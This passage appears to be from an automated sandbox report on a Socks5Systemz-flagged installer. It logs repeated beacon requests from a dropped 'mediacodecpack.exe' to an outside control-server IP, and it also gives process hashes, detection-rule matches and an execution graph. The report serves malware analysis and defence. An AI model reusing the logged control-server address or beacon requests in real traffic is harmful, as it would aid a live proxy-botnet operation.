                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:49 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:48 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:49 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.849799188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:50 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:51 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:51 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:51 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.849807188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:53 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:53 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:53 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:53 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.849814188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:55 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:56 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:56 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.849820188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:57 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:58 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:58 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          24192.168.2.849825188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:10:00 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:10:01 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:10:00 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:10:01 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          25192.168.2.849831188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:10:02 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:10:03 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:10:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:10:03 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          26192.168.2.849838188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:10:05 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:10:05 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:10:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:10:05 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          27192.168.2.849845188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:10:07 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:10:08 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:10:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:10:08 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:15:08:02
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\Desktop\Hbq580QZAR.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Hbq580QZAR.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:3'445'716 bytes
                                                                                          MD5 hash:015BCE2662BF644E819A99D3D2B0548B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:1
                                                                                          Start time:15:08:02
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp" /SL5="$1042E,3196748,56832,C:\Users\user\Desktop\Hbq580QZAR.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:706'560 bytes
                                                                                          MD5 hash:ED6A19AD054AD0172201AF725324781B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2736047862.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 3%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:3
                                                                                          Start time:15:08:03
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                                                                                          Imagebase:0x400000
                                                                                          File size:3'306'150 bytes
                                                                                          MD5 hash:ADAB835347D3F69415F7ED6C10C13B85
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1493879108.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2735509305.0000000002CA1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:21.5%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:2.4%
                                                                                            Total number of Nodes:1520
                                                                                            Total number of Limit Nodes:22
                                                                                            execution_graph 5446 407548 5447 407554 CloseHandle 5446->5447 5448 40755d 5446->5448 5447->5448 6683 402b48 RaiseException 5888 407749 5889 4076dc WriteFile 5888->5889 5894 407724 5888->5894 5890 4076e8 5889->5890 5891 4076ef 5889->5891 5892 40748c 35 API calls 5890->5892 5893 407700 5891->5893 5895 4073ec 34 API calls 5891->5895 5892->5891 5894->5888 5896 4077e0 5894->5896 5895->5893 5897 4078db InterlockedExchange 5896->5897 5899 407890 5896->5899 5898 4078e7 5897->5898 6684 40294a 6685 402952 6684->6685 6686 402967 6685->6686 6687 403554 4 API calls 6685->6687 6687->6685 6688 403f4a 6689 403f53 6688->6689 6690 403f5c 6688->6690 6692 403f07 6689->6692 6695 403f09 6692->6695 6694 403f3c 6694->6690 6697 403154 4 API calls 6695->6697 6699 403e9c 6695->6699 6702 403f3d 6695->6702 6715 403e9c 6695->6715 6696 403ea9 6704 402674 4 API calls 6696->6704 6705 403ecf 6696->6705 6697->6695 6698 403ef2 6701 402674 4 API calls 6698->6701 6699->6694 6699->6696 6699->6698 6706 403e8e 6699->6706 6701->6705 6702->6690 6704->6705 6705->6690 6707 403e4c 6706->6707 6708 403e62 6707->6708 6709 403e7b 6707->6709 6712 403e67 6707->6712 6711 403cc8 4 API calls 6708->6711 6710 402674 4 API calls 6709->6710 6713 403e78 6710->6713 6711->6712 6712->6713 6714 402674 4 API calls 6712->6714 6713->6696 6713->6698 6714->6713 6716 403ed7 6715->6716 6722 403ea9 6715->6722 6717 403ef2 6716->6717 6719 403e8e 4 API calls 6716->6719 6720 402674 4 API calls 6717->6720 6718 403ecf 6718->6695 6721 403ee6 6719->6721 6720->6718 6721->6717 6721->6722 6722->6718 6723 402674 4 API calls 6722->6723 6723->6718 6242 40ac4f 6243 40abc1 6242->6243 6244 4094d8 9 API calls 6243->6244 6246 40abed 6243->6246 6244->6246 6245 40ac06 6247 40ac1a 6245->6247 6248 40ac0f DestroyWindow 6245->6248 6246->6245 6249 40ac00 RemoveDirectoryA 6246->6249 6250 40ac42 6247->6250 6251 40357c 4 API calls 6247->6251 6248->6247 6249->6245 6252 40ac38 6251->6252 6253 4025ac 4 API calls 6252->6253 6253->6250 6254 403a52 6255 403a74 6254->6255 6256 403a5a WriteFile 6254->6256 6256->6255 6257 403a78 GetLastError 6256->6257 6257->6255 6258 402654 6259 403154 4 API calls 6258->6259 6260 402614 6259->6260 6261 403154 4 API calls 6260->6261 6262 402632 6260->6262 6261->6262 6263 40ac56 6264 40ac5d 6263->6264 6266 40ac88 6263->6266 6273 409448 6264->6273 6268 403198 4 API calls 6266->6268 6267 40ac62 6267->6266 6270 40ac80 MessageBoxA 6267->6270 6269 40acc0 6268->6269 6271 403198 4 API calls 6269->6271 6270->6266 6272 40acc8 6271->6272 6274 409454 GetCurrentProcess OpenProcessToken 6273->6274 6275 4094af ExitWindowsEx 6273->6275 6276 409466 6274->6276 6277 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6274->6277 6275->6276 6276->6267 6277->6275 6277->6276 6732 40995e 6734 409960 6732->6734 6733 409982 6734->6733 6735 40999e CallWindowProcA 6734->6735 6735->6733 6736 409960 6737 409982 6736->6737 6739 40996f 6736->6739 6738 40999e CallWindowProcA 6738->6737 6739->6737 6739->6738 6740 405160 6741 405173 6740->6741 6742 404e58 33 API calls 6741->6742 6743 405187 6742->6743 6278 402e64 6279 402e69 6278->6279 6280 402e7a RtlUnwind 6279->6280 6281 402e5e 6279->6281 6282 402e9d 6280->6282 5900 40766c SetFilePointer 5901 4076a3 5900->5901 5902 407693 GetLastError 5900->5902 5902->5901 5903 40769c 5902->5903 5904 40748c 35 API calls 5903->5904 5904->5901 6295 40667c IsDBCSLeadByte 6296 406694 6295->6296 6756 403f7d 6757 403fa2 6756->6757 6760 403f84 6756->6760 6759 403e8e 4 API calls 6757->6759 6757->6760 6758 403f8c 6759->6760 6760->6758 6761 402674 4 API calls 6760->6761 6762 403fca 6761->6762 6763 403d02 6769 403d12 6763->6769 6764 403ddf ExitProcess 6765 403db8 6766 403cc8 4 API calls 6765->6766 6768 403dc2 6766->6768 6767 403dea 6770 403cc8 4 API calls 6768->6770 6769->6764 6769->6765 6769->6767 6769->6769 6773 403da4 6769->6773 6774 403d8f MessageBoxA 6769->6774 6771 403dcc 6770->6771 6783 4019dc 6771->6783 6779 403fe4 6773->6779 6774->6765 6775 403dd1 6775->6764 6775->6767 6780 403fe8 6779->6780 6781 403f07 4 API calls 6780->6781 6782 404006 6781->6782 6784 401abb 6783->6784 6785 4019ed 6783->6785 6784->6775 6786 401a04 RtlEnterCriticalSection 6785->6786 6787 401a0e LocalFree 6785->6787 6786->6787 6788 401a41 6787->6788 6789 401a2f VirtualFree 6788->6789 6790 401a49 6788->6790 6789->6788 6791 401a70 LocalFree 6790->6791 6792 401a87 6790->6792 6791->6791 6791->6792 6793 401aa9 RtlDeleteCriticalSection 6792->6793 6794 401a9f RtlLeaveCriticalSection 6792->6794 6793->6775 6794->6793 6301 404206 6302 4041cc 6301->6302 6305 40420a 6301->6305 6303 404282 6304 403154 4 API calls 6306 404323 6304->6306 6305->6303 6305->6304 6307 402c08 6308 402c82 6307->6308 6311 402c19 6307->6311 6309 402c56 RtlUnwind 6310 403154 4 API calls 6309->6310 6310->6308 6311->6308 6311->6309 6314 402b28 6311->6314 6315 402b31 RaiseException 6314->6315 6316 402b47 6314->6316 6315->6316 6316->6309 6317 408c10 6318 408c17 6317->6318 6319 403198 4 API calls 6318->6319 6327 408cb1 6319->6327 6320 408cdc 6321 4031b8 4 API calls 6320->6321 6322 408d69 6321->6322 6323 408cc8 6325 4032fc 18 API calls 6323->6325 6324 403278 18 API calls 6324->6327 6325->6320 6326 4032fc 18 API calls 6326->6327 6327->6320 6327->6323 6327->6324 6327->6326 6332 40a814 6333 40a839 6332->6333 6334 40993c 29 API calls 6333->6334 6337 40a83e 6334->6337 6335 40a891 6366 4026c4 GetSystemTime 6335->6366 6337->6335 6340 408dd8 18 API calls 6337->6340 6338 40a896 6339 409330 46 API calls 6338->6339 6341 40a89e 6339->6341 6342 40a86d 6340->6342 6343 4031e8 18 API calls 6341->6343 6346 40a875 MessageBoxA 6342->6346 6344 40a8ab 6343->6344 6345 406928 19 API calls 6344->6345 6347 40a8b8 6345->6347 6346->6335 6348 40a882 6346->6348 6349 4066c0 19 API calls 6347->6349 6350 405864 19 API calls 6348->6350 6351 40a8c8 6349->6351 6350->6335 6352 406638 19 API calls 6351->6352 6353 40a8d9 6352->6353 6354 403340 18 API calls 6353->6354 6355 40a8e7 6354->6355 6356 4031e8 18 API calls 6355->6356 6357 40a8f7 6356->6357 6358 4074e0 37 API calls 6357->6358 6359 40a936 6358->6359 6360 402594 18 API calls 6359->6360 6361 40a956 6360->6361 6362 407a28 19 API calls 6361->6362 6363 40a998 6362->6363 6364 407cb8 35 API calls 6363->6364 6365 40a9bf 6364->6365 6366->6338 5444 407017 5445 407008 SetErrorMode 5444->5445 6367 403018 6368 403070 6367->6368 6369 403025 6367->6369 6370 40302a RtlUnwind 6369->6370 6371 40304e 6370->6371 6373 402f78 6371->6373 6374 402be8 6371->6374 6375 402bf1 RaiseException 6374->6375 6376 402c04 6374->6376 6375->6376 6376->6368 6381 40901e 6382 409010 6381->6382 6383 408fac Wow64RevertWow64FsRedirection 6382->6383 6384 409018 6383->6384 6385 409020 SetLastError 6386 409029 6385->6386 6401 403a28 ReadFile 6402 403a46 6401->6402 6403 403a49 GetLastError 6401->6403 5905 40762c ReadFile 5906 407663 5905->5906 5907 40764c 5905->5907 5908 407652 GetLastError 5907->5908 5909 40765c 5907->5909 5908->5906 5908->5909 5910 40748c 35 API calls 5909->5910 5910->5906 6805 40712e 6806 407118 6805->6806 6807 403198 4 API calls 6806->6807 6808 407120 6807->6808 6809 403198 4 API calls 6808->6809 6810 407128 6809->6810 5925 40a82f 5926 409ae8 18 API calls 5925->5926 5927 40a834 5926->5927 5928 40a839 5927->5928 5929 402f24 5 API calls 5927->5929 5962 40993c 5928->5962 5929->5928 5931 40a891 5967 4026c4 GetSystemTime 5931->5967 5933 40a83e 5933->5931 6028 408dd8 5933->6028 5934 40a896 5968 409330 5934->5968 5938 40a86d 5942 40a875 MessageBoxA 5938->5942 5939 4031e8 18 API calls 5940 40a8ab 5939->5940 5986 406928 5940->5986 5942->5931 5944 40a882 5942->5944 6031 405864 5944->6031 5949 40a8d9 6013 403340 5949->6013 5951 40a8e7 5952 4031e8 18 API calls 5951->5952 5953 40a8f7 5952->5953 5954 4074e0 37 API calls 5953->5954 5955 40a936 5954->5955 5956 402594 18 API calls 5955->5956 5957 40a956 5956->5957 5958 407a28 19 API calls 5957->5958 5959 40a998 5958->5959 5960 407cb8 35 API calls 5959->5960 5961 40a9bf 5960->5961 6035 40953c 5962->6035 5965 4098cc 19 API calls 5966 40995c 5965->5966 5966->5933 5967->5934 5977 409350 5968->5977 5971 409375 CreateDirectoryA 5972 4093ed 5971->5972 5973 40937f GetLastError 5971->5973 5974 40322c 4 API calls 5972->5974 5973->5977 5975 4093f7 5974->5975 5978 4031b8 4 API calls 5975->5978 5976 408dd8 18 API calls 5976->5977 5977->5971 5977->5976 5979 404c94 33 API calls 5977->5979 5981 407284 19 API calls 5977->5981 5984 408da8 18 API calls 5977->5984 5985 405890 18 API calls 5977->5985 6091 406cf4 5977->6091 6114 409224 5977->6114 5980 409411 5978->5980 5979->5977 5982 4031b8 4 API calls 5980->5982 5981->5977 5983 40941e 5982->5983 5983->5939 5984->5977 5985->5977 6220 406820 5986->6220 5989 403454 18 API calls 5990 40694a 5989->5990 5991 4066c0 5990->5991 6225 4068e4 5991->6225 5994 4066f0 5996 403340 18 API calls 5994->5996 5995 4066fe 5997 403454 18 API calls 5995->5997 5999 4066fc 5996->5999 5998 406711 5997->5998 6000 403340 18 API calls 5998->6000 6001 403198 4 API calls 5999->6001 6000->5999 6002 406733 6001->6002 6003 406638 6002->6003 6004 406642 6003->6004 6005 406665 6003->6005 6231 406950 6004->6231 6007 40322c 4 API calls 6005->6007 6009 40666e 6007->6009 6008 406649 6008->6005 6010 406654 6008->6010 6009->5949 6011 403340 18 API calls 6010->6011 6012 406662 6011->6012 6012->5949 6014 403344 6013->6014 6015 4033a5 6013->6015 6016 4031e8 6014->6016 6017 40334c 6014->6017 6020 403254 18 API calls 6016->6020 6023 4031fc 6016->6023 6017->6015 6019 40335b 6017->6019 6021 4031e8 18 API calls 6017->6021 6018 403228 6018->5951 6022 403254 18 API calls 6019->6022 6020->6023 6021->6019 6025 403375 6022->6025 6023->6018 6024 4025ac 4 API calls 6023->6024 6024->6018 6026 4031e8 18 API calls 6025->6026 6027 4033a1 6026->6027 6027->5951 6029 408da8 18 API calls 6028->6029 6030 408df4 6029->6030 6030->5938 6032 405869 6031->6032 6033 405940 19 API calls 6032->6033 6034 40587b 6033->6034 6034->6034 6042 40955b 6035->6042 6036 409590 6038 40959d GetUserDefaultLangID 6036->6038 6043 409592 6036->6043 6037 409594 6047 407024 GetModuleHandleA GetProcAddress 6037->6047 6038->6043 6041 40956f 6041->5965 6042->6036 6042->6037 6042->6041 6043->6041 6044 4095cb GetACP 6043->6044 6045 4095ef 6043->6045 6044->6041 6044->6043 6045->6041 6046 409615 GetACP 6045->6046 6046->6041 6046->6045 6048 407067 6047->6048 6049 40705e 6047->6049 6050 407070 6048->6050 6051 4070a8 6048->6051 6058 403198 4 API calls 6049->6058 6068 406f68 6050->6068 6052 406f68 RegOpenKeyExA 6051->6052 6056 4070c1 6052->6056 6054 407089 6055 4070de 6054->6055 6071 406f5c 6054->6071 6060 40322c 4 API calls 6055->6060 6056->6055 6059 406f5c 20 API calls 6056->6059 6062 407120 6058->6062 6063 4070d5 RegCloseKey 6059->6063 6064 4070eb 6060->6064 6065 403198 4 API calls 6062->6065 6063->6055 6066 4032fc 18 API calls 6064->6066 6067 407128 6065->6067 6066->6049 6067->6043 6069 406f73 6068->6069 6070 406f79 RegOpenKeyExA 6068->6070 6069->6070 6070->6054 6074 406e10 6071->6074 6075 406e36 RegQueryValueExA 6074->6075 6076 406e59 6075->6076 6081 406e7b 6075->6081 6077 406e73 6076->6077 6076->6081 6082 403278 18 API calls 6076->6082 6083 403420 18 API calls 6076->6083 6079 403198 4 API calls 6077->6079 6078 403198 4 API calls 6080 406f47 RegCloseKey 6078->6080 6079->6081 6080->6055 6081->6078 6082->6076 6084 406eb0 RegQueryValueExA 6083->6084 6084->6075 6085 406ecc 6084->6085 6085->6081 6086 4034f0 18 API calls 6085->6086 6087 406f0e 6086->6087 6088 406f20 6087->6088 6090 403420 18 API calls 6087->6090 6089 4031e8 18 API calls 6088->6089 6089->6081 6090->6088 6133 406a58 6091->6133 6095 406a58 19 API calls 6097 406d36 6095->6097 6096 406d26 6096->6095 6098 406d72 6096->6098 6099 406d42 6097->6099 6101 406a34 21 API calls 6097->6101 6141 406888 6098->6141 6099->6098 6102 406d67 6099->6102 6105 406a58 19 API calls 6099->6105 6101->6099 6102->6098 6153 406cc8 GetWindowsDirectoryA 6102->6153 6107 406d5b 6105->6107 6106 406638 19 API calls 6108 406d87 6106->6108 6107->6102 6109 406a34 21 API calls 6107->6109 6110 40322c 4 API calls 6108->6110 6109->6102 6111 406d91 6110->6111 6112 4031b8 4 API calls 6111->6112 6113 406dab 6112->6113 6113->5977 6115 409244 6114->6115 6116 406638 19 API calls 6115->6116 6117 40925d 6116->6117 6118 40322c 4 API calls 6117->6118 6125 409268 6118->6125 6119 406978 20 API calls 6119->6125 6121 408dd8 18 API calls 6121->6125 6122 4033b4 18 API calls 6122->6125 6123 405890 18 API calls 6123->6125 6125->6119 6125->6121 6125->6122 6125->6123 6126 4092e4 6125->6126 6193 4091b0 6125->6193 6201 409034 6125->6201 6127 40322c 4 API calls 6126->6127 6128 4092ef 6127->6128 6129 4031b8 4 API calls 6128->6129 6130 409309 6129->6130 6131 403198 4 API calls 6130->6131 6132 409311 6131->6132 6132->5977 6134 4034f0 18 API calls 6133->6134 6135 406a6b 6134->6135 6136 406a82 GetEnvironmentVariableA 6135->6136 6140 406a95 6135->6140 6155 406dec 6135->6155 6136->6135 6137 406a8e 6136->6137 6139 403198 4 API calls 6137->6139 6139->6140 6140->6096 6150 406a34 6140->6150 6142 403414 6141->6142 6143 4068ab GetFullPathNameA 6142->6143 6144 4068b7 6143->6144 6145 4068ce 6143->6145 6144->6145 6146 4068bf 6144->6146 6147 40322c 4 API calls 6145->6147 6148 403278 18 API calls 6146->6148 6149 4068cc 6147->6149 6148->6149 6149->6106 6159 4069dc 6150->6159 6154 406ce9 6153->6154 6154->6098 6156 406dfa 6155->6156 6157 4034f0 18 API calls 6156->6157 6158 406e08 6157->6158 6158->6135 6166 406978 6159->6166 6161 4069fe 6162 406a06 GetFileAttributesA 6161->6162 6163 406a1b 6162->6163 6164 403198 4 API calls 6163->6164 6165 406a23 6164->6165 6165->6096 6176 406744 6166->6176 6168 4069b0 6171 4069c6 6168->6171 6172 4069bb 6168->6172 6170 406989 6170->6168 6183 406970 CharPrevA 6170->6183 6184 403454 6171->6184 6173 40322c 4 API calls 6172->6173 6175 4069c4 6173->6175 6175->6161 6180 406755 6176->6180 6177 4067b9 